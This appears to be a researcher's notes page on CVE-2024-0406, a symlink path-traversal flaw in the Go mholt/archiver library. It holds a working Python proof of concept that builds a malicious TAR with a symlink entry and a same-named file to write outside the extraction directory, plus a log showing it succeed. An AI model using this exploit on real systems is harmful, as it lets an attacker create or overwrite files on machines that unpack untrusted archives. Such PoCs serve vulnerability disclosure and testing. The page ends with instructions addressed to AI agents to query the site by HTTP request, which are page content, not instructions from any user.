# CVE-2024-0406

A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted <mark style="color:red;">**TAR**</mark> file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the <mark style="color:red;">creation</mark> or <mark style="color:red;">overwriting</mark> of files with the user's or application's privileges using the library.

Affected versions: >=3.0.0 <= 3.5.1

***

### PoC || GTFO

```bash
» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session 
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session

# Upload file to target which use Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:20 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
```

```python
import tarfile
import sys
import io

def create_tar(tar_path, symlink_target):
    with tarfile.open(tar_path, 'w') as tar:
        # Create a symlink entry './x' pointing to symlink_target
        symlink_info = tarfile.TarInfo(name='./x')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = symlink_target
        tar.addfile(symlink_info)
        
        # Optional: Add a file with the same name 'x'
        payload_content = b'<some-file-content-here>'
        payload_info = tarfile.TarInfo(name='x')
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))
        
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)
    
    symlink_target = sys.argv[1]
    tar_path = "cve-2024-0406.tar"

    create_tar(tar_path, symlink_target)
    print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/golang/mholt-archiver/cve-2024-0406.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.